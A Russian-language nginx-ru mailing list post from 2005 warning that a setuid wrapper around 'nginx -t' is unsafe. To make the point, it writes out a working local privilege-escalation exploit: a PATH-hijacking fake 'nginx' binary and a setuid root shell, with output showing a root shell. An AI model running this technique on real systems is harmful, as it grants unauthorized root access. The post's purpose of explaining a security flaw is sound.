Проверить конфигурацию непривелегированным пользователем
L0rda
l0rda at l0rda.biz
Fri Sep 2 17:24:09 MSD 2005
Andrei Nigmatulin wrote:
>Хотя, для себя я проблему решил - setuid binary, исполняющий "nginx -t" ;-)
>
>
Гхм.. не советую;)
а потом кто-то сделает так:
cat>sh.c<<EOF
#include <sys/types.h>
#include <unistd.h>
main() {
setuid(0);
setgid(0);
system("/bin/sh");
}
EOF
cat>nginx.c<<EOF
#include <sys/types.h>
#include <unistd.h>
main() {
system("/bin/chown root:root /tmp/sh;/bin/chmod +s /tmp/sh");
}
EOF
gcc -o sh sh.c
gcc -o nginx nginx.c
export PATH=`pwd`
vash_setuid_binary &
export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
./sh
# id
uid=0(root) gid=0(root) groups=0(root)
и никаких переполнений буфера 8)
--
Best regards, Kirill,
http://www.Fedora-Hosting.com
More information about the nginx-ru
mailing list